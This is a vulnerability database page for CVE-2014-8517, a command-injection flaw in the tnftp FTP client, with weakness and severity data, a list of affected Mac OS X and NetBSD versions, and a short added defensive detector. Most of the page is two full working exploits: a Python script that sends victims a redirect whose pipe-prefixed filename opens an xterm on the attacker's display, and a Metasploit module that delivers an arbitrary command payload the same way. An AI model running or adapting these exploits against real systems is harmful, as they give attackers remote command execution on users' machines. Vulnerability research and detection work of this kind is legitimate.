Related Weaknesses
CWE-ID | Weakness Name | Source
CWE-77 | Improper Neutralization of Special Elements used in a Command ('Command Injection'): The product constructs all or part of a command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended command when it is sent to a downstream component. |
Metrics
Metrics | Score | Severity | CVSS Vector | Source
V2 | 7.5 | | AV:N/AC:L/Au:N/C:P/I:P/A:P | [email protected]
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0% and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
EPSS Percentile
The percentile is used to rank CVEs according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVEs. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVEs.
Exploit information
Exploit Database EDB-ID : 35427
Publication date : 2014-12-01 23h00 +00:00
Author : dash
EDB Verified : No
```python
#!/usr/bin/env python2
#
# Exploit Title: [tnftp BSD exploit]
# Date: [11/29/2014]
# Exploit Author: [dash]
# Vendor Homepage: [www.freebsd.org]
# Version: [FreeBSD 8/9/10]
# Tested on: [FreeBSD 9.3]
# CVE : [CVE-2014-8517]
# tnftp exploit (CVE-2014-8517) tested against freebsd 9.3
# https://www.freebsd.org/security/advisories/FreeBSD-SA-14:26.ftp.asc
#
# 29 Nov 2014 by [email protected]
#
# usage:
#
# redirect the vulnerable ftp client requests for http to your machine
#
# client will do something like:
# ftp http://ftp.freebsd.org/data.txt
#
# you will intercept the dns request and redirect victim to your fake webserver ip
#
# attacker: start on 192.168.2.1 Xnest: Xnest -ac :1
# probably do also xhost+victimip
#
# attacker: python CVE-2014-8517.py 192.168.1.1 81 192.168.1.1
#
# sadly you cannot put a slash behind the | also www-encoded is not working
# plus problems with extra pipes
# this renders a lot of useful commands useless
# so xterm -display it was ;)
#
# *dirty* *dirdy* *dyrdy* *shell* !
#
import os
import sys
import time
import socket


def usage():
    print "CVE-2014-8517 tnftp exploit"
    print "by [email protected] in 29 Nov 2014"
    print
    print "%s <redirect ip> <redirect port> <reverse xterm ip>" % (sys.argv[0])
    print "%s 192.168.1.1 81 192.168.2.1" % (sys.argv[0])


# bind a fake webserver on 0.0.0.0 port 80
def webserveRedirect(redirect):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    s.bind(("0.0.0.0", 80))
    s.listen(3)
    h, c = s.accept()
    # wait for request
    # print h.recv(1024)
    # send 302
    print "[+] Sending redirect :>"
    h.send(redirect)
    s.close()
    return 0


# bind a fake webserver on port %rport
def deliverUgga(owned):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    s.bind(("0.0.0.0", rport))
    s.listen(3)
    h, c = s.accept()
    # print h.recv(1024)
    print "[+] Deliver some content (shell is spwaned now)"
    h.send(owned)
    s.close()
    return 0


owned = """HTTP/1.1 200 Found
Date: Fri, 29 Nov 2014 1:00:03 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 5
Connection: close
Content-Type: text/html; charset=iso-8859-1

ugga ugga
"""

if (os.getuid()) != 0:
    print "[-] Sorry, you need root to bind port 80!"
    sys.exit(1)

# three positional arguments are used below (argv[1..3])
if len(sys.argv) < 4:
    usage()
    sys.exit(1)

rip = sys.argv[1]
rport = int(sys.argv[2])
revip = sys.argv[3]

print "[+] Starting tnftp BSD client side exploit (CVE-2014-8517)"
print "[+] Dont forget to run Xnest -ac :1"

# ok, lets use xterm -display
cmd = "xterm -display %s:1" % (revip)
cmd = cmd.replace(" ", "%20")
print "[+] Payload: [%s]" % cmd

redirect = "HTTP/1.1 302\r\n"\
    "Content-Type: text/html\r\n"\
    "Connection: keep-alive\r\n"\
    "Location: http://%s:%d/cgi-bin/|%s\r\n"\
    "\r\n\r\n" % (rip, rport, cmd)

# child process owned data delivery
uggapid = os.fork()
if uggapid == 0:
    uggapid = os.getpid()
    deliverUgga(owned)
else:
    # child process for webserver redirect
    webpid = os.fork()
    if webpid == 0:
        webpid = os.getpid()
        webserveRedirect(redirect)

# childs, come home!
try:
    os.waitpid(webpid, 0)
except:
    pass
try:
    os.waitpid(uggapid, 0)
except:
    pass

# oh wait :>
time.sleep(5)
```
Exploit Database EDB-ID : 43112
Publication date : 2017-11-02 23h00 +00:00
Author : Metasploit
EDB Verified : Yes
```ruby
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpServer
  include Msf::Auxiliary::Report

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'tnftp "savefile" Arbitrary Command Execution',
      'Description'    => %q{
        This module exploits an arbitrary command execution vulnerability in
        tnftp's handling of the resolved output filename - called "savefile" in
        the source - from a requested resource.

        If tnftp is executed without the -o command-line option, it will resolve
        the output filename from the last component of the requested resource.

        If the output filename begins with a "|" character, tnftp will pass the
        fetched resource's output to the command directly following the "|"
        character through the use of the popen() function.
      },
      'Author'         => [
        'Jared McNeill', # Vulnerability discovery
        'wvu'            # Metasploit module
      ],
      'References'     => [
        ['CVE', '2014-8517'],
        ['URL', 'http://seclists.org/oss-sec/2014/q4/459']
      ],
      'DisclosureDate' => 'Oct 28 2014',
      'License'        => MSF_LICENSE,
      'Platform'       => 'unix',
      'Arch'           => ARCH_CMD,
      'Privileged'     => false,
      'Payload'        => {'BadChars' => '/'},
      'Targets'        => [['ftp(1)', {}]],
      'DefaultTarget'  => 0
    ))
  end

  def on_request_uri(cli, request)
    unless request['User-Agent'] =~ /(tn|NetBSD-)ftp/
      print_status("#{request['User-Agent']} connected")
      send_not_found(cli)
      return
    end

    if request.uri.ends_with?(sploit)
      send_response(cli, '')
      print_good("Executing `#{payload.encoded}'!")
      report_vuln(
        :host => cli.peerhost,
        :name => self.name,
        :refs => self.references,
        :info => request['User-Agent']
      )
    else
      print_status("#{request['User-Agent']} connected")
      print_status('Redirecting to exploit...')
      send_redirect(cli, sploit_uri)
    end
  end

  def sploit_uri
    (get_uri.ends_with?('/') ? get_uri : "#{get_uri}/") +
      Rex::Text.uri_encode(sploit, 'hex-all')
  end

  def sploit
    "|#{payload.encoded}"
  end
end
```
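The module description above states the whole mechanism: without -o, tnftp derives its output filename ("savefile") from the last path component of the requested resource, and a name beginning with "|" was handed to popen(). The following is an added example, not part of the CVE record and not code from either exploit or from tnftp itself. It mirrors that derivation in Python 3 so a proxy or egress gateway can flag an HTTP redirect whose target would produce such a name, and shows the defensive decision the fix took (refuse a leading "|" rather than try to strip it). Percent-decoding is applied because the Metasploit module hex-encodes the whole component. The log format, the helper names and the sample addresses are assumptions constructed for the example.

```python
"""Added example (not from the CVE record, the exploits, or tnftp).

Mirrors tnftp's savefile derivation to detect and refuse the
CVE-2014-8517 pattern: a URL whose last path component decodes to a
name starting with '|'.
"""
from urllib.parse import urlsplit, unquote


def derive_savefile(url: str) -> str:
    """Filename tnftp would use when -o is not given: the percent-decoded
    last component of the URL path (decoding assumed from the module's
    hex-all encoding of the component)."""
    path = urlsplit(url).path
    last = path.rsplit("/", 1)[-1]
    return unquote(last)


def is_pipe_savefile(url: str) -> bool:
    """True when the derived savefile starts with '|', the pattern that
    made the unfixed tnftp run the remainder through popen()."""
    return derive_savefile(url).startswith("|")


def safe_savefile(url: str) -> str:
    """Defensive derivation: refuse an empty name or a leading '|' outright
    instead of sanitising it, so no shell interpretation can occur."""
    name = derive_savefile(url)
    if not name or name.startswith("|"):
        raise ValueError("refusing to derive output filename from %r" % url)
    return name


def flag_redirects(log_lines):
    """Scan proxy log lines of the constructed form
    '<client> <status> <Location header value>' and return the
    (client, location) pairs whose redirect would yield a pipe savefile."""
    hits = []
    for line in log_lines:
        parts = line.split(None, 2)
        if len(parts) != 3:
            continue
        client, status, location = parts
        if status.startswith("30") and is_pipe_savefile(location):
            hits.append((client, location))
    return hits


# Constructed sample log lines (addresses from documentation ranges).
SAMPLE_LOG = [
    "10.0.0.5 200 -",
    "10.0.0.5 302 http://mirror.example/pub/data.txt",
    "10.0.0.7 302 http://203.0.113.9:81/cgi-bin/|xterm%20-display%20203.0.113.9:1",
    "10.0.0.8 302 http://203.0.113.9/%7Ctrue",
]


if __name__ == "__main__":
    for client, location in flag_redirects(SAMPLE_LOG):
        print("%s redirected to pipe savefile %r" % (client, derive_savefile(location)))
```

The third sample line reproduces the shape of the redirect the Python exploit above emits; the fourth shows that a fully percent-encoded component is caught only because the check decodes before testing, which is the detail a naive `startswith("|")` on the raw URL would miss.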
Products Mentioned
Configuration 0
Apple>>Mac_os_x >> Version 10.8.5
Apple>>Mac_os_x >> Version 10.9.5
Apple>>Mac_os_x >> Version 10.10.0
Apple>>Mac_os_x >> Version 10.10.1
Configuration 0
Netbsd>>Netbsd >> Version 5.1
Netbsd>>Netbsd >> Version 5.1.1
Netbsd>>Netbsd >> Version 5.1.2
Netbsd>>Netbsd >> Version 5.1.3
Netbsd>>Netbsd >> Version 5.1.4
Netbsd>>Netbsd >> Version 5.2
Netbsd>>Netbsd >> Version 5.2.1
Netbsd>>Netbsd >> Version 5.2.2
Netbsd>>Netbsd >> Version 6.0
Netbsd>>Netbsd >> Version 6.0.1
Netbsd>>Netbsd >> Version 6.0.2
Netbsd>>Netbsd >> Version 6.0.3
Netbsd>>Netbsd >> Version 6.0.4
Netbsd>>Netbsd >> Version 6.0.5
Netbsd>>Netbsd >> Version 6.0.6
Netbsd>>Netbsd >> Version 6.1
Netbsd>>Netbsd >> Version 6.1.1
Netbsd>>Netbsd >> Version 6.1.2
Netbsd>>Netbsd >> Version 6.1.3
Netbsd>>Netbsd >> Version 6.1.4
Netbsd>>Netbsd >> Version 6.1.5
References